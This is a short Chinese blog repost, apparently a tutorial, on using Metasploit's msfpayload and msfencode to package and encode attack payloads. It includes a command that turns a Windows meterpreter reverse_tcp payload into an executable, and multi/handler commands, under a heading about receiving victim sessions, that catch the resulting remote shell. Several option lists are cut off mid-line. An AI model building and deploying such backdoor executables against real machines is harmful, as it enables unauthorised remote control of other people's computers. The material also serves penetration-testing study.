metasploit攻击载荷独立封装和编码
2020-12-13 14:43
标签:des http java get 使用 文件 封装攻击载荷 metasploit攻击载荷独立封装和编码,搜素材,soscw.com metasploit攻击载荷独立封装和编码 标签:des http java get 使用 文件 原文地址:http://www.cnblogs.com/Chorder/p/3794655.html
msfpayload:
Usage:
msfpayload [
Summary:summary and optons of payload
C:C language
Perl:Perl
Ruby:Ruby
Raw:Raw,allows payload to be piped into msfencode and other tools
Js:JavaScript
eXe:windows executable
Dll:Dll
Vba:VBA
War:war package
example:
msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter
msfpayload windows/meterpreter/reverse_tcp O:show options
msfpayload [payload] X >xx.exe
攻击载荷编码
msfencode:
Usage:
msfencode
OPTIONS:
-a
-b
-c
-d
-e
-h Help banner:帮助标题
-i
-k Keep template working; run payload in new thread (use with -x):让模板继续工作;即让载荷在新线程中运行
-l List available encoders:列出可用的编码器
-m
-n Dump encoder information:输出编码器信息
-o
-p
-s
-t
-v Increase verbosity:增加冗长
-x
受害会话接收
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.x.x LPORT xxxx
msf exploit(handler) > exploit
[*] Started reverse handler on x.x.x.x:xxxx
[*] Starting the payload handler...
也可以不打开msfconsole,用msfcli
Usage:
msfcli
文章标题:metasploit攻击载荷独立封装和编码
文章链接:http://soscw.com/index.php/essay/34403.html